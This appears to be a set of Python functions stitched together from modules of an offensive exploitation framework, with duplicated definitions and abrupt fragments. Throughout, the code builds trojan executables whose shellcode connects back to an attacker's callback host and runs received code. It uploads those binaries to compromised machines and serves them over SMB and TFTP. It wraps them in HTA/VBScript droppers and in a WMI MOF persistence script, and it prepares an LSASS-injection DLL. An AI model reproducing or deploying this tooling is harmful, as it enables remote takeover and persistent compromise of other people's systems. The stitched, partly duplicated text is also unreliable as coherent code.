def get_trojan(self):
trojan = ''
try:
sc = shellcodeGenerator.win32()
sc.addAttr('findeipnoesp', {'subespval': 0})
sc.addAttr('revert_to_self_before_importing_ws2_32', None)
sc.addAttr('tcpconnect', {
'port': self.callback_port,
'ipaddress': self.callback_ip
})
mosdef_type = self.engine.getMosdefType(
canvasengine.WIN32MOSDEF_INTEL)
mosdef_id = self.engine.getNewMosdefID(self)
sc.addAttr("send_universal", {
"mosdef_type": mosdef_type,
"mosdef_id": mosdef_id
})
sc.addAttr("RecvExecDepSafe", {'socketreg': 'FDSPOT'})
sc.addAttr("ExitThread", None)
sc.vAllocSelf = True #we need to move to another page!
myPElib = pelib.PElib()
trojan = myPElib.createPEFileBuf(sc.get())
except:
import traceback
traceback.print_exc(file=sys.stderr)
return trojan
def maketrojan(self):
host = self.callback.ip
port = self.callback.port
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp", {"subespval": 0x1000})
if self.useSSL:
ssl = "s"
else:
ssl = ""
sc.addAttr("httpGetShellcode",
{"URL": "http%s://%s:%d/w" % (ssl, host, port)})
shellcode = sc.get()
myPElib = pelib.PElib()
self.mosdeftrojan = myPElib.createPEFileBuf(shellcode)
self.log("Writing out %d bytes to %s" %
(len(self.mosdeftrojan), self.trojanname))
self.htafile = self.file4hta(self.mosdeftrojan)
file(self.trojanname, "wb").write(self.htafile)
self.setInfo("%s - done" % (NAME))
ret = len(self.mosdeftrojan) != 0
return ret
def init_trojan(self):
"""
Build + upload the trojan
"""
trojan = ''
try:
myPElib = pelib.PElib()
trojan = myPElib.createPEFileBuf(self.shellcode)
# write out the binary
src = os.path.join(self.local_path, self.trojan_name)
self.log('WP> Creating trojan in %s' % src)
fd = open(src, 'wb')
fd.write(trojan)
fd.close()
# upload the binary
self.log('WP> Uploading trojan ...')
dst = os.path.join(self.remote_path, self.trojan_name)
ret = self.node.shell.upload(src, destfilename=dst)
self.log('WP> %s' % ret)
os.unlink(src)
except:
import traceback
traceback.print_exc(file=sys.stderr)
return False
return True
def maketrojan(self):
shellcode = self.createInjectToSelf(self.callback.ip,
self.callback.port)
myPElib = pelib.PElib()
troj = myPElib.createPEFileBuf(shellcode)
self.log('[D2] Writing out %d bytes to %s' % (len(troj), self.srcbin))
file(self.srcbin, "wb").write(troj)
def run(self):
self.getargs()
self.setInfo("%s (in progress)" % (NAME))
#check to make sure we have a proxyaddr argument
if not self.proxyaddr:
self.log("Cannot continue without a proxy address")
self.setInfo("%s failed without PROXYADDR argument" % NAME)
return 0
#check to make sure we have a domain argument
if not self.domain:
self.log("Cannot continue without a domain name")
self.setInfo("%s failed without DOMAIN argument" % NAME)
return 0
p = payloads.payloads()
sc = p.dns_proxy("CNNN.NN.%s.%s" % ('dummy', self.domain), self.proxyaddr)
#sc = p.httpcachedownload( self.url )
sc = p.assemble(sc)
myPElib = pelib.PElib()
exe = myPElib.createPEFileBuf(sc, gui=True)
afile = file(self.filename, 'wb+')
afile.write(exe)
afile.close()
self.log("File written to %s of %d bytes"%(self.filename, len(exe)))
self.setInfo("%s Wrote %s callback to %s - done" % (NAME, self.proxyaddr, self.filename))
return len(sc) != 0
def makefile(self):
myPElib = pelib.PElib()
try:
self.mosdeftrojan=myPElib.createPEFileBuf(self.shellcode)
except Exception, err:
self.log("WP> Problem building MOSDEF PE Trojan: %s"%(err))
self.setInfo("WP> %s attacking %s:%d - completed (failed!)"%(NAME,self.host,self.port))
return 0
def buildTrojan(self, type="Linux", arch="X86"):
"build a MOSDEF based trojan binary"
mosdeftrojan = ""
if type in ["Linux", "Solaris"]:
from MOSDEF import makeexe
from MOSDEF.cc import threadsafe_cc_main
self.log("[!] Compiling Unix trojan")
infilename = "backdoors/cback_mmap_rwx.c"
vars = {}
vars['CBACK_PORT'] = self.callback.port
vars['CBACK_ADDR'] = str2int32(socket.inet_aton(self.callback.ip))
self.log("[!] Callback address is %s" % vars['CBACK_ADDR'])
cc_command = []
for var in vars:
cc_command += ["-D", "%s=%s" % (var, vars[var])]
cc_command += ["-v", "-m", type, "-p", arch, infilename]
self.log("[!] CC command: %s" % cc_command)
mosdeftrojan = threadsafe_cc_main(cc_command)
if not mosdeftrojan:
self.log("[X] Was unable to create trojan!")
return ""
self.log("[!] Length of CC compiled trojan: %s" %
len(mosdeftrojan))
elif type in ["Windows"]:
from MOSDEF import pelib
from shellcode import shellcodeGenerator
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp", {"subespval": 0}) #don't mess with eip
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect", {
"port": self.callback.port,
"ipaddress": self.callback.ip
})
sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("ExitThread", None)
shellcode = sc.get()
myPElib = pelib.PElib()
mosdeftrojan = myPElib.createPEFileBuf(shellcode)
if mosdeftrojan == None:
self.log("Some sort of error compiling our PE")
return ""
self.log("[!] Win32 MOSDEF Trojan compiled to %d bytes" %
len(mosdeftrojan))
return mosdeftrojan
def init_callback(self):
"""
Build + upload the MOSDEF callback trojan. On x64 capabable
systems we use the x64 callback.
"""
if not self.callback:
self.log('[-] No callback set!')
return False
trojan = ''
try:
sc = shellcodeGenerator.win32()
sc.addAttr('findeipnoesp', {'subespval': 0})
sc.addAttr('revert_to_self_before_importing_ws2_32', None)
sc.addAttr('tcpconnect', {
'port': self.callback.port,
'ipaddress': self.callback.ip
})
mosdef_type = self.engine.getMosdefType(
canvasengine.WIN32MOSDEF_INTEL)
mosdef_id = self.engine.getNewMosdefID(self)
sc.addAttr("send_universal", {
"mosdef_type": mosdef_type,
"mosdef_id": mosdef_id
})
sc.addAttr("RecvExecDepSafe", {'socketreg': 'FDSPOT'})
sc.addAttr("ExitThread", None)
sc.vAllocSelf = True #we need to move to another page!
callback_payload = sc.get()
myPElib = pelib.PElib()
trojan = myPElib.createPEFileBuf(callback_payload)
# write out the binary
src = os.path.join(self.local_path, self.trojan_name)
self.log('[+] Creating callback trojan in %s' % src)
fd = open(src, 'wb')
fd.write(trojan)
fd.close()
# upload the binary
self.log('[+] Uploading callback trojan ...')
ret = self.node.shell.upload(src,
destfilename=self.remote_path +
self.trojan_name)
self.log('[+] %s' % ret)
except:
import traceback
traceback.print_exc(file=sys.stderr)
return False
return True
def set_up_smb_server(self):
self.log("WP> Starting SMB Server on 0.0.0.0:445")
mysmb = SMBServer('0.0.0.0', 445)
mysmb.timeout = 30
# Use payload provided by calling module if it exists
if self.argsDict.has_key("trojanPayload"):
self.shellcode = self.argsDict.get("trojanPayload")
self.log("WP> Building MOSDEF PE Trojan")
myPElib = pelib.PElib()
try:
self.mosdeftrojan = myPElib.createPEFileBuf(self.shellcode)
except Exception, err:
self.log("WP> Problem building MOSDEF PE Trojan: %s" % (err))
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
class theexploit(tcpexploit, httpclientside):
def __init__(self):
tcpexploit.__init__(self)
httpclientside.__init__(self)
self.clientversion = 1
self.name = NAME
self.trojanname = "index.php"
self.filename = "index.html"
return
def maketrojan(self):
proxy_payload = ''
try:
if hasattr(self, 'HTTPMOSDEF') and self.HTTPMOSDEF == True:
# make sure that fromcreatethread is set to 0 in your
# httpserver/exploit listenerArgsDict!
import shellcode.standalone.windows.payloads as payloads
ssl_dict = {True: 'https', False: 'http'}
print "XXX: self.useSSL ..." + str(self.useSSL)
p = payloads.payloads()
sc = p.http_proxy(
"%s://%s" % (ssl_dict[self.useSSL], self.callback.ip),
self.callback.port)
proxy_payload = p.assemble(sc)
except Exception, msg:
import traceback
traceback.print_exc(file=sys.stderr)
proxy_payload = ''
myPElib = pelib.PElib()
self.mosdeftrojan = myPElib.createPEFileBuf(proxy_payload)
self.log("Writing out %d bytes to %s" %
(len(self.mosdeftrojan), self.trojanname))
file(self.trojanname, "wb").write(self.mosdeftrojan)
self.setInfo("%s - done" % (NAME))
ret = len(self.mosdeftrojan) != 0
return ret
def set_up_tftp_server(self):
"""
Returns False if could not set up the TFTPD server, otherwise, returns the TFTPD object
"""
self.log("building the MOSDEF trojan")
shellcode = self.createShellcode()
#use pelib to build the universal callback shellcode into a trojan .exe
from MOSDEF import pelib
pe = pelib.PElib()
self.mosdeftrojan = pe.createPEFileBuf(shellcode)
self.log("Starting up tftp server")
try:
myServer = TftpServer(allfiles=self.mosdeftrojan)
myServer.listen()
except Exception, msg:
self.log("Failed to set up TFTPD: %s" % msg)
return False
def run(self):
self.getargs()
self.setInfo("%s (in progress)" % (NAME))
#check to make sure we have a url argument
if not self.url:
self.log("Cannot continue without a URL argument")
self.setInfo("%s failed without URL argument"%NAME)
return 0
p = payloads.payloads()
sc = p.httpcachedownload( self.url )
sc = p.assemble(sc)
myPElib = pelib.PElib()
exe = myPElib.createPEFileBuf(sc, gui=True)
afile = file(self.filename, 'wb+')
afile.write(exe)
afile.close()
self.log("File written to %s of %d bytes"%(self.filename, len(exe)))
self.setInfo("%s Wrote %s callback to %s - done" % (NAME,self.url, self.filename))
return len(sc) != 0
class theexploit(tcpexploit,httpclientside):
def __init__(self):
tcpexploit.__init__(self)
httpclientside.__init__(self)
self.clientversion = 1
self.name = NAME
self.trojanname = "index.hta"
self.filename = "index.html"
self.batch = "file.txt"
self.url_num = 0
return
def file4hta(self, exename):
evilprog = "explorer.exe"
e = []
for a in exename:
for b in a:
if b == "\r":
d = "0d"
elif b == "\n":
d = "0a"
elif b == "\0":
d = "00"
else:
c = hex(ord(b))
d = c.replace("0x", "")
if len(d) == 1:
d = "0"+d
e.append(d)
i = 0
j = 0
l = len(e)
hta = "<SCRIPT language=vbs>\n\n"
while 1:
hta += " prog = prog & \""
while i != 24:
hta += "%s," % e[j]
if j == l-1:
break
i += 1
j += 1
if j == l-1:
hta = hta[:-1] + "\"\n\n"
break
hta += "\"\n"
i = 0
hta += " tmp = Split(prog, \",\")\n"
hta += " Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"
hta += " Set shell = CreateObject(\"WScript.Shell\")\n"
hta += " userprofile = shell.ExpandEnvironmentStrings(\"%USERPROFILE%\")\n"
hta += " path = userprofile & \"\\\" & \"%s\"\n" % evilprog
hta += " Set f = fso.CreateTextFile(path, True)\n\n"
hta += " For i = 0 To UBound(tmp)\n"
hta += " prog = Int(\"&H\" & tmp(i))\n"
hta += " f.Write Chr(prog)\n"
hta += " Next\n\n"
hta += " f.Close\n"
hta += " shell.Run Chr(34) & path & Chr(34), 7, false\n"
hta += " self.Close\n"
hta += "</SCRIPT>\n"
return hta
def maketrojan(self):
proxy_payload = ''
try:
if hasattr(self, 'HTTPMOSDEF') and self.HTTPMOSDEF == True:
# make sure that fromcreatethread is set to 0 in your
# httpserver/exploit listenerArgsDict!
import shellcode.standalone.windows.payloads as payloads
ssl_dict = { True : 'https', False : 'http' }
print "XXX: self.useSSL ..." + str(self.useSSL)
p = payloads.payloads()
sc = p.http_proxy("%s://%s" % (ssl_dict[self.useSSL], self.callback.ip), self.callback.port)
proxy_payload = p.assemble(sc)
except Exception,msg:
import traceback
traceback.print_exc(file=sys.stderr)
proxy_payload = ''
myPElib = pelib.PElib()
self.mosdeftrojan = myPElib.createPEFileBuf(proxy_payload)
self.log("Writing out %d bytes to %s" % (len(self.mosdeftrojan), self.trojanname))
self.htafile = self.file4hta(self.mosdeftrojan)
file(self.trojanname, "wb").write(self.htafile)
self.setInfo("%s - done" % (NAME))
ret = len(self.mosdeftrojan) != 0
return ret
def vm_prepare_executables(self, tmp_directory):
if self.is_64bit_node() and (not self.is_win10_node()):
logging.info(
"VM exploit not capable of running on pre-10 Windows versions")
return None
c_string_padding = "A" * 300
exploit_name = "%s.exe" % random.randint(1001, 2000)
exploit_local_path = os.path.join(self.local_res,
"tmp_%s" % exploit_name)
exploit_rem_path = tmp_directory + exploit_name
mosdef_dll_name = "%s.dll" % random.randint(2001, 3000)
mosdef_local_path = os.path.join(self.local_res,
"tmp_%s" % mosdef_dll_name)
mosdef_rem_path = tmp_directory + mosdef_dll_name
return_value = [(exploit_local_path, exploit_rem_path),
(mosdef_local_path, mosdef_rem_path)]
exploit_orig_name = "vm_exploit32.exe"
if self.is_64bit_node() or self.has_wow64():
exploit_orig_name = "vm_exploit64.exe"
shellcode = None
mosdeftrojan = None
if self.is_64bit_node() or self.has_wow64():
pld = payloads64(module=self, dll=True)
shellcode_asm = pld.InjectToSelf(self.callback.ip,
self.callback.port)
shellcode = pld.assemble(shellcode_asm)
myPElib = pelib.PElib(win64=1)
mosdeftrojan = myPElib.createPEFileBuf({'DllMain': shellcode},
gui=True)
else:
pld = payloads(module=self, dll=True)
shellcode_asm = pld.injectintoprocess(self.callback.ip,
self.callback.port,
load_winsock=True,
SeDebugPrivilege=True,
waitcode=False,
exit_thread=True,
universal=True,
dll_create_thread=False)
shellcode = pld.assemble(shellcode_asm)
myPElib = pelib.PElib()
importante = myPElib.get_random_imports()
mosdeftrojan = myPElib.createPEFileBuf({'DllMain': shellcode},
gui=True,
importante=importante)
if mosdeftrojan == None:
logging.error("Error while building our PE")
return None
else:
logging.info("Writing MOSDEF LSASS inject trojan to %s" %
mosdef_local_path)
with open(mosdef_local_path, "wb") as handle:
handle.write(mosdeftrojan)
exploit_data = None
with open(os.path.join(self.local_res, exploit_orig_name),
"rb") as handle:
exploit_data = handle.read()
exploit_data = self.replace_c_string(
exploit_data, "MOSDEF_SHIM_DLL_PATH" + c_string_padding,
mosdef_rem_path)
logging.info("Writing exploit to %s" % exploit_local_path)
with open(exploit_local_path, "wb") as handle:
handle.write(exploit_data)
return return_value
def generateMOF(self):
sc=shellcodeGenerator.win32()
sc.addAttr('findeipnoesp', {'subespval':0})
sc.addAttr('revert_to_self_before_importing_ws2_32', None)
sc.addAttr('tcpconnect', {'port': self.callback.port,
'ipaddress':self.callback.ip})
mosdef_type=self.engine.getMosdefType(canvasengine.WIN32MOSDEF_INTEL)
mosdef_id=self.engine.getNewMosdefID(self)
self.log("Creating MOSDEF ID: %d"%mosdef_id)
sc.addAttr('send_universal',{'mosdef_type': mosdef_type,'mosdef_id':mosdef_id})
sc.addAttr('RecvExecDepSafe',{'socketreg':'FDSPOT'})
sc.addAttr('ExitProcess',None)
sc.vAllocSelf=True
callback_payload=sc.get()
myPElib=pelib.PElib()
binary=myPElib.createPEFileBuf(callback_payload)
vbs=''
for i in range(0,len(binary),8):
vbs+='"binary = binary & \\"'
for j in range(8):
if (i+j)>=len(binary):
break
vbs+='%02x'%(ord(binary[i+j]))
if (i+j)!=len(binary)-1:
vbs+=','
vbs+='\\"\\n"\n'
vbs+='"tmp = Split(binary, \\",\\")\\n"\n'
vbs+='"Set fso = CreateObject(\\"Scripting.FileSystemObject\\")\\n"\n'
vbs+='"Set shell = CreateObject(\\"WScript.Shell\\")\\n"\n'
vbs+='"userprofile = shell.ExpandEnvironmentStrings(\\"%USERPROFILE%\\")\\n"\n'
vbs+='"path = userprofile & \\"\\\\\\" & \\"cb%d.exe\\"\\n"\n'%(random.randint(1,99))
vbs+='"Set f = fso.CreateTextFile(path, True)\\n"\n'
vbs+='"For i = 0 To UBound(tmp)\\n"\n'
vbs+='" b = Int(\\"&H\\" & tmp(i))\\n"\n'
vbs+='" f.Write Chr(b)\\n"\n'
vbs+='"Next\\n"\n'
vbs+='"f.Close\\n"\n'
vbs+='"shell.Run Chr(34) & path & Chr(34), 7, false\\n"'
mof="""#pragma namespace ("\\\\\\\\.\\\\root\\\\subscription")
#pragma deleteclass("MyASEventConsumer", nofail)
#pragma deleteinstance("__EventFilter.Name=\\\"EF\\\"", nofail)
#pragma deleteinstance("ActiveScriptEventConsumer.Name=\\\"ASEC\\\"", nofail)
class MyASEventConsumer
{
[key]string Name;
};
instance of ActiveScriptEventConsumer as $CONSUMER
{
CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0};
Name = "ASEC";
ScriptingEngine = "VBScript";
ScriptText =
SCRIPT;
};
instance of __EventFilter as $FILTER
{
CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0};
Name = "EF";
Query = "SELECT * FROM __InstanceCreationEvent"
" WHERE TargetInstance.__class = \\"MyASEventConsumer\\"";
QueryLanguage = "WQL";
};
instance of __FilterToConsumerBinding as $BINDING
{
CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0};
Filter = $FILTER;
Consumer = $CONSUMER;
};
instance of MyASEventConsumer
{
Name = "Trigger";
};
""".replace('SCRIPT',vbs)
#print mof
return mof
